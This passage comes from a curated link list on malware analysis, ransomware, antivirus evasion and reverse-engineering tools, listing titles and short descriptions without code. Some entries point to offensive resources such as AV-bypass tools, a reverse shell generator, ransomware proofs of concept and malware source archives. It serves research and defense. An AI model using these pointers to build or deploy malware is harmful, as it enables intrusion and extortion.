- [MalwareWorld](https://malwareworld.com/): Check for Suspicious Domains and IPs. Repo: [MalwareWorld](https://github.com/carlospolop/MalwareWorld): System based on +500 blacklists and 5 external intelligences to detect internet potencially malicious hosts
- [C2Matrix](https://www.thec2matrix.com/): The goal of this site is to point you to the best C2 framework for your needs based on your adversary emulation plan and the target environment
- [LOLBITS](https://github.com/Kudaes/LOLBITS): C2 framework that uses Background Intelligent Transfer Service (BITS) as communication protocol and Direct Syscalls + Dinvoke for EDR user-mode hooking evasion.
- [MalwareBazaar](https://bazaar.abuse.ch/): is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers.
- [What is MWDB Core?](https://www.cert.pl/en/news/single/set-up-your-own-malware-repository-with-mwdb-core/) [mwdb-core](https://github.com/CERT-Polska/mwdb-core): Malware repository component for samples & static configuration with REST API interface.
- [Malpedia](https://malpedia.caad.fkie.fraunhofer.de/): The primary goal of Malpedia is to provide a resource for rapid identification and actionable context when investigating malware. Openness to curated contributions shall ensure an accountable level of quality in order to foster meaningful and reproducible research.

### Ransomwares

- [Ransomware decryption tool](https://github.com/newsoft/envoye-special-decryptor)
- [Schroedinger’s Pet(ya)](https://securelist.com/schroedingers-petya/78870/)
- [Player 3 Has Entered the Game: Say Hello to 'WannaCry'](http://blog.talosintelligence.com/2017/05/wannacry.html)
- [WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm](https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168)
- [Ransomware Overview](https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml#)
- [Analyzing GrandSoft Exploit Kit](http://www.nao-sec.org/2018/02/analyzing-grandsoft-exploit-kit.html) and [code](https://gist.github.com/anonymous/089810f4581b86edf27827a0a4ebeff4)
- [Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation](https://securingtomorrow.mcafee.com/mcafee-labs/rapidly-evolving-ransomware-gandcrab-version-5-partners-with-crypter-service-for-obfuscation/)
- [hidden-tear](https://github.com/goliate/hidden-tear): It's a ransomware-like file crypter sample which can be modified for specific purposes.
- [Tracking REvil](https://www.kpn.com/security-blogs/Tracking-REvil.htm): This blog describes our efforts in tracking the REvil ransomware and its affiliates for the past six months. REvil has been around since 2019 and is one of the top variants of ransomware causing havoc at many organizations around the globe ever since. The KPN Security Research Team was able to acquire C2 sinkholes allowing for the tracking of infections across the globe.
- [Sodinokibi (aka REvil) Ransomware](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/). [Sodinokibi (aka REvil) Ransomware](https://twitter.com/TheDFIRReport/status/1376481762935767040)
- [REvil Master Key for Kaseya Attack Posted to XSS](https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/)
- [After the ransom was paid, the attackers even provided some bonus security advice!](https://twitter.com/jc_stubbs/status/1289200557794553857/photo/1)
- [Phirautee](https://github.com/Viralmaniar/Phirautee): A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShell and does not require any third-party libraries. This tool steals the information, holds an organisation’s data to hostage for payments or permanently encrypts/deletes the organisation data.
- [Sophisticated new Android malware marks the latest evolution of mobile ransomware](https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/)
- [Raccine](https://github.com/Neo23x0/Raccine): A Simple Ransomware Vaccine
- [Genetic Analysis of CryptoWall Ransomware](https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f)
- [Brazilian Justice Court Ransomware: Another piece in the Puzzle](https://secret.inf.ufpr.br/2020/11/17/brazilian-justice-court-ransomware-another-piece-in-the-puzzle/)
- [A Ransomware has landed! @Embraer](https://secret.inf.ufpr.br/2020/12/15/a-ransomware-has-landed-embraer/) by SECRET
- [RANSOMWARE GUIDANCE AND RESOURCES](https://www.cisa.gov/ransomware)
- [No More Ransom!](https://www.nomoreransom.org/en/index.html)
- [PYSA/Mespinoza Ransomware](https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/)
- [PYSA Ransomware](https://cyberflorida.org/threat-advisory/pysa-ransomware/)
- [Mespinoza Analysis — New ransomware variant targets France](https://sapphirex00.medium.com/mespinoza-analysis-new-ransomware-variant-targets-france-d4f82cbee86c)
- [Some #PYSA / #Mespinoza #Ransomware Samples](https://twitter.com/JAMESWT_MHT/status/1380016670622818309)
- [Cerber Ransomware](https://twitter.com/dimitribest/status/1376877563214143497)
- [RansomEXX Trojan attacks Linux systems](https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/)
- [FIN7 - Lizar client Interface version 2.0.4](https://m.habr.com/ru/company/bizone/blog/553136/) [tweet](https://twitter.com/CryptoInsane/status/1385019649461477380)
- [Introducing COLT – Compromise to Leak Time](https://vulnerability.ch/2021/05/colt-compromise-to-leak-time/)
- [RANSOM MAFIA.ANALYSIS OF THE WORLD’S FIRST RANSOMWARE CARTEL](https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf)
- [Sleuthing DarkSide Crypto-Ransom Payments with the Wolfram Language](https://blog.wolfram.com/2021/05/25/sleuthing-darkside-crypto-ransom-payments-with-the-wolfram-language/)
- [Apostle Ransomware Analysis](https://cyberpunkleigh.wordpress.com/2021/05/27/apostle-ransomware-analysis/)
- [From Wiper to Ransomware | The Evolution of Agrius](https://labs.sentinelone.com/from-wiper-to-ransomware-the-evolution-of-agrius/)
- [Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise](https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html)
- [Hades Ransomware Operators Use Distinctive Tactics and Infrastructure](https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure)
- [Miscellaneous Malware RE](https://github.com/k-vitali/Malware-Misc-RE)
- [BlackMatter x64 Linux Variant | esxcli variant](https://twitter.com/VK_Intel/status/1423188690126266370), [blackmatter functions](https://github.com/k-vitali/Malware-Misc-RE/blob/master/2021-08-05-blackmatter-ransom-linux-esxcli-func-vk.raww)
- [Teaching an Old Dog New Tricks: 2017 Magniber Ransomware Uses PrintNightmare Vulnerability to Infect Victims in South Korea](https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/)
- [RansomExx Renner](https://otx.alienvault.com/pulse/611ecd98c0e17d68bf061a06/)
- [RANSOMWHERE](https://ransomwhe.re/): Total tracked ransomware payments all time. Ransomwhere is the open, crowdsourced ransomware payment tracker. Browse and download ransomware payment data or help build our dataset by reporting ransomware demands you have received.
- [BlackByteDecryptor](https://github.com/SpiderLabs/BlackByteDecryptor): This is a decryptor for the ransomware BlackByte.
- [Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus](https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html): We investigate mhyprot2.sys, a vulnerable anti-cheat driver for the popular role-playing game Genshin Impact. The driver is currently being abused by a ransomware actor to kill antivirus processes and services for mass-deploying ransomware.

### Virus/Anti-Virus

- [Avast open-sources its machine-code decompiler](https://blog.avast.com/avast-open-sources-its-machine-code-decompiler)
- [Morris worm](https://github.com/arialdomartini/morris-worm)
- [make a process unkillable?!](https://secrary.com/Random/UnKillable/) (windows 10)
- [Attack inception](https://cloudblogs.microsoft.com/microsoftsecure/2018/07/26/attack-inception-compromised-supply-chain-within-a-supply-chain-poses-new-risks/): Compromised supply chain within a supply chain poses new risks – Microsoft Secure.
- [Curtis' Blog: Bypassing Next Gen AV During a Pentest](https://curtbraz.blogspot.com/2018/08/bypassing-next-gen-av-during-pentest.html)
- [Inception](https://github.com/two06/Inception/): Provides In-memory compilation and reflective loading of C# apps for AV evasion.
- [Invoke-NeutralizeAV](https://github.com/curtbraz/Invoke-NeutralizeAV): Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting.
- [BinariesThatDoesOtherStuff](https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2#file-binariesthatdoesotherstuff-txt).
- [Circlean](https://github.com/CIRCL/Circlean): USB key cleaner.
- [The ELF Virus Writing HOWTO](http://www.linuxsecurity.com/resource_files/documentation/virus-writing-HOWTO/_html/index.html).
- [mcreator](https://github.com/blacknbunny/mcreator): Encoded Reverse Shell Generator With Techniques To Bypass AV's.
- [metame](https://github.com/a0rtega/metame): is a simple metamorphic code engine for [arbitrary executables](https://www.kitploit.com/2019/09/metame-metame-is-metamorphic-code.html).
- [rustdsplit](https://github.com/epi052/rustdsplit): At some point, I learned about a method to perform a binary search on a file in order to identify its AV signature and change it to bypass signature-based AV. The tool I used back then is gone, so I wrote this.
- [Virus Total API in Python](https://github.com/fr0gger/yeti/blob/master/plugins/feeds/public/virustotal_apiv3.py)
- [VirusTotal CLI](https://github.com/VirusTotal/vt-cli)
- [rustdsplit](https://github.com/epi052/rustdsplit): At some point, I learned about a method to perform a binary search on a file in order to identify its AV signature and change it to bypass signature-based AV. The tool I used back then is gone, so I wrote this.
- [Antivirus Event Analysis Cheat Sheet v1.7.2](https://www.nextron-systems.com/2019/10/04/antivirus-event-analysis-cheat-sheet-v1-7-2/)
- [UglyEXe](https://medium.com/@markmotig/uglyexe-bypass-some-avs-4a10313277aa): [bypass some AVs](https://github.com/fashionproof/UglyEXe)
- [How to bypass Defender in a few easy steps](https://arty-hlr.com/blog/2021/05/06/how-to-bypass-defender/)
- [Engineering antivirus evasion](https://blog.scrt.ch/2020/06/19/engineering-antivirus-evasion/)
- [avcleaner](https://github.com/scrt/avcleaner): C/C++ source obfuscator for antivirus bypass
- [An Empirical Assessment of Endpoint Security Systems Against Advanced Persistent Threats Attack Vectors](https://papers.vx-underground.org/papers/VXUG/Mirrors/APT_assessment_v3_FINAL.pdf)
- [VxSig](https://github.com/google/vxsig): Automatically generate AV byte signatures from sets of similar binaries.

### Trojans/Loggers

- [IcedID Banking Trojan Shares Code with Pony 2.0 Trojan](http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/)
- [Turla](https://www.welivesecurity.com/2018/08/22/turla-unique-outlook-backdoor/): In and out of its unique Outlook backdoor
- [QMKhuehuebr](https://github.com/mthbernardes/QMKhuehuebr): Trying to hack into keyboards

### Malware Articles and Sources

- [“VANILLA” malware](https://link.springer.com/article/10.1007/s11416-019-00333-y): vanishing antiviruses by interleaving layers and layers of attacks
- [A Mix of Python & VBA in a Malicious Word Document](https://isc.sans.edu/forums/diary/A+Mix+of+Python+VBA+in+a+Malicious+Word+Document/26578/)
- [MalwareAnalysisForHedgehogs](https://www.youtube.com/c/MalwareAnalysisForHedgehogs/videos): Throw your bat cape over your spikes and get started with malware analysis and reverse engineering.
I work as a malware analyst and like to share my knowledge.
- [2020-10-22 - TRAFFIC ANALYSIS EXERCISE - OMEGACAST](https://malware-traffic-analysis.net/2020/10/22/index.html)
- [EMOTET](https://www.malware-traffic-analysis.net/2018/07/20/index.html): EMOTET INFECTIONS WITH ZEUS PANDA BANKER AND TRICKBOT (GTAG: DEL34)
- [A MIPS-32 ELF non-resident virus with false disassembly](https://vx-underground.org/papers/VXUG/Exclusive/Bakounin/Linux.Bak0unin.asm), Made with love by S01den (@s01den)
- [Linux.Kropotkine.asm](https://github.com/vxunderground/MalwareSourceCode/blob/8ce86aa641299d8cfa13ce801bcb6a6b292d6f9b/VXUG/Linux.Kropotkine.asm)
- [A WILD KOBALOS APPEARS](https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf), Tricksy Linux malware goes after HPCs. [kobalos iocs](https://github.com/eset/malware-ioc/tree/master/kobalos)
- [List of victim organizations attacked by Ransomware gangs released on the DarkWeb](https://drive.google.com/file/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3/view?usp=sharing)

## Reverse Engineering

- (pt-br) [Fundamentos de Engenharia Reversa](https://mentebinaria.gitbook.io/engenharia-reversa/)
- [Reverse Engineer's Toolkit](https://github.com/mentebinaria/retoolkit)
- [Dangers of the Decompiler](https://blog.ret2.io/2017/11/16/dangers-of-the-decompiler/)
- [RE guide for beginners: Methodology and tools](https://0x00sec.org/t/re-guide-for-beginners-methodology-and-tools/2242)
- [REDasm](https://github.com/REDasmOrg/REDasm): Crossplatform, interactive, multiarchitecture disassembler
- [Reversing ARM Binaries](https://zygosec.com/post1.html)
- [Programmer De-anonymization from Binary Executables](https://github.com/calaylin/bda)
- [Reverse engineering WhatsApp Web](https://github.com/sigalor/whatsapp-web-reveng)
- [BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)](https://medium.com/bugbountywriteup/bolo-reverse-engineering-part-1-basic-programming-concepts-f88b233c63b7)
- [BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)](https://medium.com/@danielabloom/bolo-reverse-engineering-part-2-advanced-programming-concepts-b4e292b2f3e)
- [Reverse Engineering for Beginners](https://www.begin.re)
- [VivienneVMM](https://github.com/changeofpace/VivienneVMM): VivienneVMM is a stealthy debugging framework implemented via an Intel VT-x hypervisor.
- [Xori](https://github.com/endgameinc/xori): Custom disassembly framework
- [rattle](https://github.com/trailofbits/rattle): Rattle is an EVM binary static analysis framework designed to work on deployed smart contracts.
- [starshipraider](https://github.com/azonenberg/starshipraider): High performance embedded systems debug/reverse engineering platform
- [GBA-IDA-Pseudo-Terminal](https://github.com/LanHikari22/GBA-IDA-Pseudo-Terminal): IDAPython tools to aid with analysis, disassembly and data extraction using IDA python commands, tailored for the GBA architecture at some parts
- [binja-ipython](https://github.com/ernw/binja-ipython): A plugin to integrate an IPython kernel into Binary Ninja.
- [PySameSame](https://github.com/DissectMalware/PySameSame): This is a python version of samesame repo to generate homograph strings
- [Reversing a Japanese Wireless SD Card From Zero to Code Execution](https://docs.google.com/presentation/d/13OJNOb2IMwp79SDrbxSLF3i7StTgWLdD7QlYpic39r8/edit#slide=id.g3d28bb72e8_5_74)
- [Practical-Reverse-Engineering-using-Radare2](https://github.com/s4n7h0/Practical-Reverse-Engineering-using-Radare2): Training Materials of Practical Reverse Engineering using Radare2
- [Reverse engineering Go binaries using Radare 2 and Python](https://carvesystems.com/news/reverse-engineering-go-binaries-using-radare-2-and-python/)
- [r2pipe for V](https://github.com/radare/v-r2pipe): r2pipe for V.
- [radare2-webui](https://github.com/radareorg/radare2-webui): webui repository for radare2.
- IDA Pro:
- [idaemu](https://github.com/36hours/idaemu): idaemu is an IDA Pro Plugin - use for emulating code in IDA Pro.
- [lighthouse](https://github.com/gaasedelen/lighthouse): Code Coverage Explorer for IDA Pro & Binary Ninja
- [IDAPro Cheat Sheet](https://malwareunicorn.org/workshops/idacheatsheet.html)
- [Lumen](https://github.com/naim94a/lumen): A private Lumina server for IDA Pro
- [EFISwissKnife](https://github.com/gdbinit/EFISwissKnife): An IDA plugin to improve (U)EFI reversing.
- [IDA Python](https://medium.com/malware-buddy/reverse-engineering-tips-ida-python-bd0ce64a48ed)
- [Tenet](https://github.com/gaasedelen/tenet): [A Trace Explorer for Reverse Engineers](https://blog.ret2.io/2021/04/20/tenet-trace-explorer/).
- [TLS callbacks](https://hex-rays.com/blog/tls-callbacks/)
- [rename gamemaker handlers](https://github.com/ioncodes/ida_scripts/blob/main/rename_gamemaker_handlers.py)
- GDB:
- [pwndbg](https://github.com/pwndbg/pwndbg): Exploit Development and Reverse Engineering with GDB Made Easy
- [PEDA](https://github.com/longld/peda): Python Exploit Development Assistance for GDB.
- [about gef](https://www.offensivethink.com/about-gef.html). [gef](https://github.com/hugsy/gef): GDB Enhanced Features for exploit devs & reversers.
- [some things about gef](https://www.offensivethink.com/about-gef.html)
- [Controlling GDB](https://sourceware.org/gdb/current/onlinedocs/gdb/Controlling-GDB.html)
- [Low Level Visualization via Debuggers](https://www.vinnie.work/blog/2021-01-08-low-level-debuggers/)
- [Faster GDB Startup](https://tromey.com/blog/?p=1084)
- Frida:
- [Getting Started with Frida Tools](https://medium.com/@int0x33/day-19-getting-started-with-frida-tools-3aeb2f0063c3)
- Frida hooking android :[part 1](https://11x256.github.io/Frida-hooking-android-part-1/), [part 2](https://11x256.github.io/Frida-hooking-android-part-2/), [part 3](https://11x256.github.io/Frida-hooking-android-part-3/), [part 4](https://11x256.github.io/Frida-hooking-android-part-4/) and [part 5](https://11x256.github.io/Frida-hooking-android-part-5/)
- [fridump3](https://github.com/rootbsd/fridump3): A universal memory dumper using Frida for Python 3.
- [r2flutch](https://github.com/as0ler/r2flutch): Tool to decrypt iOS apps using r2frida.
- Immunity:
- [Immunity Debugger](https://www.immunityinc.com/products/debugger/)
- [mona](https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/) site. [mona](https://github.com/corelan/mona): is a python script that can be used to automate and speed up specific searches while developing exploits (typically for the Windows platform). It runs on Immunity Debugger and WinDBG, and requires python 2.7. Although it runs in WinDBG x64, the majority of its features were written specifically for 32bit processes.
- [LIEF](https://lief.quarkslab.com/): Library to Instrument Executable Formats ([github](https://github.com/lief-project/LIEF/))
- [DEBIN](https://debin.ai/): Predicting Debug Information in Stripped Binaries
- [Analyzing ARM Cortex-based MCU firmwares using Binary Ninja](https://research.kudelskisecurity.com/2018/09/25/analyzing-arm-cortex-based-mcu-firmwares-using-binary-ninja/)
- [Manticore](https://www.kitploit.com/2018/11/manticore-symbolic-execution-tool-for.html?m=1): Symbolic Execution Tool For Analysis Of Binaries And Smart Contracts. [manticore](https://github.com/trailofbits/manticore): Symbolic execution tool
- [Beam me up, CFG.](https://86hh.github.io/cfg.html): Earlier in 2018 while revisiting the Delay Import Table, I used dumpbin to check the Load Configuration data of a file and noticed new fields in it. And at the time of writing this, more fields were added! The first CFGuard caught my attention and I learned about Control Flow Guard, it is a new security feature. To put it simple, it protects the execution flow from redirection - for example, from exploits that overwrite an address in the stack. Maybe they should call it the Security Directory instead.
- [PBA - Analysis Tools](https://github.com/Fare9/PBA_Analysis_Tools): My own versions from the programs of the book "Practical Binary Analysis"
- [functrace](https://github.com/invictus1306/functrace): is a tool that helps to analyze a binary file with dynamic instrumentation using DynamoRIO
- [Signature-Base](https://github.com/Neo23x0/signature-base): signature-base is the signature database for my scanners LOKI and SPARK Core.
- [Generic Anomalies](https://github.com/Neo23x0/signature-base/blob/master/yara/generic_anomalies.yar#L379): Detects an embedded executable in a non-executable file
- [Virtuailor](https://github.com/0xgalz/Virtuailor): IDAPython tool for C++ vtables reconstruction.
- [Linux Reverse Engineering CTFs for Beginners](https://osandamalith.com/2019/02/11/linux-reverse-engineering-ctfs-for-beginners/).
- [execution-trace-viewer](https://github.com/teemu-l/execution-trace-viewer): Tool for viewing and analyzing execution traces
- [Reverse Engineering of a Not-so-Secure IoT Device](https://mcuoneclipse.com/2019/05/26/reverse-engineering-of-a-not-so-secure-iot-device/)
- ELF - Executable and Linkable Format:
- [Python for Reverse Engineering 1](https://icyphox.sh/blog/python-for-re-1/): ELF Binaries
- [The 101 of ELF files on Linux](https://linux-audit.com/elf-binaries-on-linux-understanding-and-analysis/): Understanding and Analysis - Linux Audit
- [On ELF, Part 1](https://kestrelcomputer.github.io/kestrel/2018/01/29/on-elf)
- [On ELF, Part 2](https://kestrelcomputer.github.io/kestrel/2018/02/01/on-elf-2)
- [Kaitai Struct](https://formats.kaitai.io/): A new way to develop parsers for binary structures.
- [findLoop](https://github.com/secrary/findLoop): find possible encryption/decryption or compression/decompression code.
- [Reverse Engineering 'A Link to the Past (GBA)' ep 1](https://sideway.re/Reverse-Engineering-alttp-GBA-ep1/)
- [wiggle](https://github.com/ChiChou/wiggle): The concepting self hosted executable binary search engine.
- [uncompyle6](https://github.com/rocky/python-uncompyle6): A cross-version [Python bytecode decompiler](https://www.kitploit.com/2019/07/uncompyle6-cross-version-python.html)
- [Decompyle++](https://github.com/zrax/pycdc): C++ python bytecode disassembler and decompiler
- [bearparser](https://github.com/hasherezade/bearparser). [PE-bear](https://github.com/hasherezade/pe-bear-releases)
- [Reverse-engineering precision op amps from a 1969 analog computer](https://www.righto.com/2019/09/reverse-engineering-precision-op-amps.html)
- [CPU Adventure – Unknown CPU Reversing](https://www.robertxiao.ca/hacking/dsctf-2019-cpu-adventure-unknown-cpu-reversing/): We reverse-engineered a program written for a completely custom, unknown CPU architecture, without any documentation for the CPU (no emulator, no ISA reference, nothing) in the span of ten hours. Read on to find out how we did it…
- [pev](https://github.com/merces/pev): pev is a full-featured, open source, multiplatform command line toolkit to work with PE (Portable Executables) binaries.
- [Sourcetrail](https://github.com/CoatiSoftware/Sourcetrail): free and open-source cross-platform source explorer.
- [Qiling Framework](https://www.qiling.io/): Qiling Advanced Binary Emulation Framework. [repo](https://github.com/qilingframework/qiling)
- Obfuscation/Deobfuscation:
- [batch_deobfuscator](https://github.com/DissectMalware/batch_deobfuscator): Deobfuscate batch scripts obfuscated using string substitution and escape character techniques.
- [Tales Of Binary Deobfuscation - Part 1](https://ulexec.github.io/ulexec.github.io/article/2020/03/03/Deobfuscation_1.html)
- [evilquest_deobfuscator](https://github.com/gdbinit/evilquest_deobfuscator): EvilQuest/ThiefQuest malware strings decrypter/deobfuscator. [evilquest_stats](https://github.com/gdbinit/evilquest_stats): Small utility to hash EvilQuest code and cstrings sections.
- [Deobfuscating DanaBot’s API Hashing](https://malwareandstuff.com/deobfuscating-danabots-api-hashing/)
- [XLMMacroDeobfuscator](https://github.com/DissectMalware/XLMMacroDeobfuscator): Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
- [syntia](https://github.com/RUB-SysSec/syntia): Program synthesis based deobfuscation framework for the USENIX 2017 paper "Syntia: Synthesizing the Semantics of Obfuscated Code"
- [Deobfuscation](https://blog.quarkslab.com/deobfuscation-recovering-an-ollvm-protected-program.html): recovering an OLLVM-protected program
- [Stadeo](https://github.com/eset/stadeo): Control-flow-flattening and string deobfuscator
- [Semi-Automatic Code Deobfuscation](https://github.com/mrphrazer/hitb2021ams_deobfuscation)
- [msynth](https://github.com/mrphrazer/msynth): Code deobfuscation framework to simplify Mixed Boolean-Arithmetic (MBA) expressions.
- [Glasgow Debug Tool](https://github.com/GlasgowEmbedded/glasgow): Scots Army Knife for electronics
- [windbglib](https://github.com/corelan/windbglib): Public repository for windbglib, a wrapper around pykd.pyd (for Windbg), used by mona.py
- [VX Underground](https://vx-underground.org/)
- [MalwareSourceCode](https://github.com/vxunderground/MalwareSourceCode): Collection of malware source code for a variety of platforms in an array of different programming languages.
- [VXUG-Papers](https://github.com/vxunderground/VXUG-Papers): Research code & [papers](https://vx-underground.org/papers.html) from members of vx-underground.
- (pt-br) [Como automaticamente atachar um processo a um debugger.](https://diegoalbuquerque.github.io/trick-to-bof-debugger.html)
- [Taming Virtual Machine Based Code Protection](https://malwareandstuff.com/taming-virtual-machine-based-code-protection-1/)
- [HyperDbg Debugger](https://github.com/HyperDbg/HyperDbg): The Source Code of HyperDbg Debugger
- [The HT Editor](https://github.com/sebastianbiallas/ht): A file editor/viewer/analyzer for executables.
- [ImHex](https://github.com/WerWolv/ImHex): A Hex Editor for Reverse Engineers, Programmers and people that value their eye sight when working at 3 AM.
- [playing with little endian](https://www.offensivethink.com/little-endian.html)
- [Finding memory bugs with AddressSanitizer](https://embeddedbits.org/finding-memory-bugs-with-addresssanitizer/)
- [flare-floss](https://github.com/fireeye/flare-floss): : FireEye Labs Obfuscated String Solver - Automatically extract obfuscated strings from malware.
- [#BazarBackdoor Group #CobaltStrike Payload](https://twitter.com/VK_Intel/status/1380765652827398148)
- [The Debugging Book](https://www.debuggingbook.org/): Tools and Techniques for Automated Software Debugging.
- [Debugging System with DCI and Windbg](https://standa-note.blogspot.com/2021/03/debugging-system-with-dci-and-windbg.html). [Plus, accompanying my first kernel-to-SMM LPE exploit & demo](https://twitter.com/standa_t/status/1376525000002334725), [SmmExploit](https://github.com/tandasat/SmmExploit).
- [SCAS/SCASB/SCASW/SCASD](https://c9x.me/x86/html/file_module_x86_id_287.html): Scan String, x86 Instruction Set Reference.
- [dexcalibur](https://github.com/FrenchYeti/dexcalibur): Android reverse engineering tool focused on dynamic instrumentation automation leveraging Frida. It disassembles dex, analyzes it statically, generates hooks, discovers reflected methods, stores intercepted data and does new things from it. Its aim is to be an all-in-one Android reverse engineering platform.
- [Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)](https://doar-e.github.io/blog/2021/04/15/reverse-engineering-tcpipsys-mechanics-of-a-packet-of-the-death-cve-2021-24086/#bonus-cve-2021-24074)
- [rr](https://github.com/rr-debugger/rr): Record and Replay Framework.
- [panda](https://github.com/panda-re/panda): Platform for Architecture-Neutral Dynamic Analysis.
- [qira](https://github.com/geohot/qira): QEMU Interactive Runtime Analyser.
- [qemu_blog](https://github.com/airbus-seclab/qemu_blog): A series of posts about QEMU internals.
- [Reverse engineering (Absolute) UEFI modules for beginners](https://standa-note.blogspot.com/2021/04/reverse-engineering-absolute-uefi.html)
- [miasm](https://github.com/cea-sec/miasm): Reverse engineering framework in Python
- [rehex](https://github.com/solemnwarning/rehex): Reverse Engineers' Hex Editor.
- [Bless](https://github.com/bwrsandman/Bless): Gtk# Hex Editor (fork)
- [Reverse Engineering the M6 Smart Fitness Bracelet](https://rbaron.net/blog/2021/07/06/Reverse-engineering-the-M6-smart-fitness-band.html)
- [Reverse Engineering a Linux executable – hello world](https://www.codementor.io/@packt/reverse-engineering-a-linux-executable-hello-world-rjceryk5d)
- [rizin](https://github.com/rizinorg/rizin): UNIX-like reverse engineering framework and command-line toolset. [site](https://rizin.re/)
- [reFlutter](https://github.com/ptswarm/reFlutter): Flutter Reverse Engineering Framework.
- [OpenSecurityTraining2](https://p.ost2.fyi/): OpenSecurityTraining Inc. (EIN 86-1180701) is a 501c3 non-profit working to create the world's best cybersecurity training.
- [Nightmare](https://guyinatuxedo.github.io/) is an intro to binary exploitation / reverse engineering course based around ctf challenges.
- [Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries](https://labs.ioactive.com/2021/07/breaking-protocol-buffers-reverse.html)
- [Sometimes static analysis of shellcode is annoying or infeasible, And what you really want to do is debug it, I'll show you how](https://twitter.com/notareverser/status/1479456627363401730).
- [capa](https://github.com/mandiant/capa): The FLARE team's open-source tool to identify capabilities in executable files.
- [aDLL](https://github.com/ideaslocas/aDLL) - Adventure of Dinamic Lynk Library: aDLL is a binary analysis tool focused on the automatic discovery of DLL Hijacking vulnerabilities. The tool analyzes the image of the binary loaded in memory to search for DLLs loaded at load-time and makes use of the Microsoft Detours library to intercept calls to the LoadLibrary/LoadLibraryEx functions to analyze the DLLs loaded at run-time.
- [pyc2bytecode](https://github.com/knight0x07/pyc2bytecode): A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling and analyzing the compiled python byte-code(.pyc) files across all python versions (including Python 3.10.*)
- [Reverse Engineering PsExec for fun and knowledge](https://cybergeeks.tech/reverse-engineering-psexec-for-fun-and-knowledge/)
- [Reverse Engineering TikTok's VM Obfuscation](https://ibiyemiabiodun.com/projects/reversing-tiktok-pt2/)

### Decompilers

- [decompile_java](https://gist.github.com/larshaendler/b0679f6e36e487d00647e2f2a2989c0c), using [CFR](http://www.benf.org/other/cfr/) - another java decompiler.
- [NoVmp](https://github.com/can1357/NoVmp): A static devirtualizer for VMProtect x64 3.x powered by VTIL.
- [Awesome IDA, x64DBG & OllyDBG plugins](https://github.com/fr0gger/awesome-ida-x64-olly-plugin): A curated list of IDA x64DBG and OllyDBG plugins.
- [edb](https://github.com/eteran/edb-debugger) is a cross-platform AArch32/x86/x86-64 debugger.
- [Interactive Delphi Reconstructor IDR](https://github.com/crypto2011/IDR): a decompiler of executable files (EXE) and dynamic libraries (DLL), written in Delphi and executed in Windows32 environment.
- [PyInstaller Extractor](https://github.com/extremecoders-re/pyinstxtractor)

### Yara

- [Yara-Rules](https://github.com/Yara-Rules/rules): Repository of yara rules
- [Repository containing Indicators of Compromise and Yara rules](https://github.com/advanced-threat-research/IOCs)
- [YARA in a nutshell](http://virustotal.github.io/yara/)
- [yara](https://github.com/virustotal/yara): The pattern matching swiss knife
- [mkYARA](https://blog.fox-it.com/2019/03/28/mkyara-writing-yara-rules-for-the-lazy-analyst/): Writing YARA rules for the lazy analyst ([github](https://github.com/fox-it/mkyara))
- [Yara-Rules](https://github.com/advanced-threat-research/Yara-Rules): Repository of YARA rules made by McAfee ATR Team.
- [ReversingLabs YARA Rules](https://github.com/reversinglabs/reversinglabs-yara-rules)
- [YaraHunts](https://github.com/sbousseaden/YaraHunts): Random hunting ordiented yara rules
- [YARA Rules for ProcFilter](https://github.com/godaddy/yara-rules)
- [ThreatHunting](https://github.com/GossiTheDog/ThreatHunting)
- [yara-validator](https://github.com/CIRCL/yara-validator): Validates yara rules and tries to repair the broken ones.
- [Vim Syntax Highlighting for YARA Rules](https://github.com/s3rvac/vim-syntax-yara): A Vim syntax-highlighting file for YARA rules covering YARA 4.0
- Rules DB:
- [xored_pefile_mini](https://github.com/tillmannw/yara-rules/blob/main/xored_pefile_mini.yara): detects files with a PE header at uint32(0x3c), xored with a key of 1, 2 or 4 bytes. by [tlansec](https://twitter.com/tlansec/status/1479039005459111936)

### Ghidra

- [ghidra](https://github.com/NationalSecurityAgency/): is a software reverse engineering (SRE) framework
- [ghidra-firmware-utils](https://github.com/al3xtjames/ghidra-firmware-utils): Ghidra utilities for analyzing firmware
- [dragondance](https://github.com/0ffffffffh/dragondance): Binary code coverage visualizer plugin for Ghidra
- [Decompiler Analysis Engine](https://ghidra-decompiler-docs.netlify.com/index.html): Welcome to the Decompiler Analysis Engine. It is a complete library for performing automated data-flow analysis on software, starting from the binary executable.
